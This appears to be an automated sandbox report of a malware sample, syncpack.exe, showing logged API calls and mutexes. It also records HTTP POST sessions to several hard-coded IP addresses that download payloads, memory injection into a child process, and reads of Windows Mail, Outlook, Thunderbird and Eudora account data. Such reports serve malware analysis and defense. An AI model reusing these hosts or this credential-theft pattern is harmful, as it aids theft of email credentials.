Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x760446b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76056676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x760447e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x760447f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75fdeee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Create Mapping C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
»
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (2038)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 2
Fn
Get Time type = Ticks, time = 202504 True 61
Fn
Get Time type = Ticks, time = 202520 True 76
Fn
Get Time type = Ticks, time = 202536 True 112
Fn
Get Time type = Ticks, time = 206888 True 1
Fn
Get Time type = Ticks, time = 206904 True 13
Fn
Get Time type = Ticks, time = 206919 True 16
Fn
Get Time type = Ticks, time = 206935 True 76
Fn
Get Time type = Ticks, time = 206950 True 78
Fn
Get Time type = Ticks, time = 206966 True 76
Fn
Get Time type = Ticks, time = 206982 True 20
Fn
Get Time type = Ticks, time = 207060 True 17
Fn
Get Time type = Ticks, time = 207075 True 12
Fn
Get Time type = Ticks, time = 207091 True 20
Fn
Get Time type = Ticks, time = 207106 True 36
Fn
Get Time type = Ticks, time = 207122 True 108
Fn
Get Time type = Ticks, time = 207138 True 107
Fn
Get Time type = Ticks, time = 207403 True 1
Fn
Get Time type = Ticks, time = 219197 True 9
Fn
Get Time type = Ticks, time = 219212 True 13
Fn
Get Time type = Ticks, time = 219228 True 9
Fn
Get Time type = Ticks, time = 219243 True 9
Fn
Get Time type = Ticks, time = 219259 True 7
Fn
Get Time type = Ticks, time = 219275 True 6
Fn
Get Time type = Ticks, time = 219290 True 32
Fn
Get Time type = Ticks, time = 219306 True 32
Fn
Get Time type = Ticks, time = 219321 True 49
Fn
Get Time type = Ticks, time = 219337 True 70
Fn
Get Time type = Ticks, time = 219353 True 60
Fn
Get Time type = Ticks, time = 248603 True 1
Fn
Get Time type = Ticks, time = 248618 True 58
Fn
Get Time type = Ticks, time = 248634 True 120
Fn
Get Time type = Ticks, time = 248649 True 70
Fn
Get Time type = Ticks, time = 250771 True 1
Fn
Get Time type = Ticks, time = 250787 True 1
Fn
Get Time type = Ticks, time = 250802 True 1
Fn
Get Time type = Ticks, time = 250818 True 10
Fn
Get Time type = Ticks, time = 250834 True 1
Fn
Get Time type = System Time, time = 2018-06-25 14:54:22 (UTC) True 1
Fn
Get Time type = Ticks, time = 250865 True 4
Fn
Get Time type = Ticks, time = 250880 True 10
Fn
Get Time type = Ticks, time = 250896 True 10
Fn
Get Time type = Ticks, time = 250912 True 11
Fn
Get Time type = Ticks, time = 250927 True 24
Fn
Get Time type = Ticks, time = 250943 True 88
Fn
Get Time type = Ticks, time = 250958 True 113
Fn
Get Time type = Ticks, time = 250974 True 29
Fn
Get Time type = Ticks, time = 251208 True 1
Fn
Get Time type = Ticks, time = 251473 True 1
Fn
Get Time type = Ticks, time = 258322 True 61
Fn
Get Time type = Ticks, time = 258337 True 17
Fn
Get Time type = Ticks, time = 260662 True 1
Fn
Get Time type = Ticks, time = 260849 True 5
Fn
Get Time type = Ticks, time = 260864 True 13
Fn
Get Time type = Ticks, time = 260880 True 15
Fn
Get Time type = Ticks, time = 260896 True 14
Fn
Get Time type = Ticks, time = 260911 True 6
Fn
Get Time type = Ticks, time = 260927 True 50
Fn
Get Time type = Ticks, time = 260942 True 35
Fn
Get Time type = Ticks, time = 260958 True 4
Fn
Get Time type = Ticks, time = 261379 True 80
Fn
Get Info type = Operating System True 48
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = Hardware Information True 3
Fn
Get Info type = Operating System False 2
Fn
Mutex (5)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMB64 True 1
Fn
Create mutex_name = Global\I78B0A7D7 True 1
Fn
Create mutex_name = Global\M78B0A7D7 True 1
Fn
Create mutex_name = Global\Nx357ECDE7 True 1
Fn
Release mutex_name = Global\I78B0A7D7 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Network Behavior
HTTP Sessions (7)
»
Information Value
Total Data Sent 1.62 KB
Total Data Received 1.12 MB
Contacted Host Count 4
Contacted Hosts 197.245.46.11, 216.46.44.93, 94.70.244.227, 190.213.248.219
HTTP Session #1
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 197.245.46.11
Server Port 80
Data Sent 333
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 197.245.46.11, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 197.245.46.11 False 1
Fn
Close Session - True 2
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 898620
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 898612, size_out = 898612 True 1
Fn
Data
Close Session - True 2
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 94.70.244.227
Server Port 80
Data Sent 0
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = 94.70.244.227, server_port = 80 False 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 190.213.248.219
Server Port 80
Data Sent 0
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
HTTP Session #5
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 280396
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 280388, size_out = 280388 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 94.70.244.227
Server Port 80
Data Sent 333
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 94.70.244.227, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 94.70.244.227 False 1
Fn
HTTP Session #7
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 216.46.44.93
Server Port 80
Data Sent 331
Data Received 156
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Process #8: syncpack.exe
182 0
»
Information Value
ID #8
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x4f4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 480
0x 12C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001c40000 0x01c40000 0x01d3ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01d40000 0x0200efff Memory Mapped File Readable False False False -
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 os_tid = 0x480, address = 0x0 True 1
Fn
Host Behavior
File (40)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 6 True 2
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 1 True 12
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 30 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 15 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 4 True 3
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 0 True 4
Fn
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 2 True 2
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp size = 7 True 1
Fn
Data
Registry (100)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
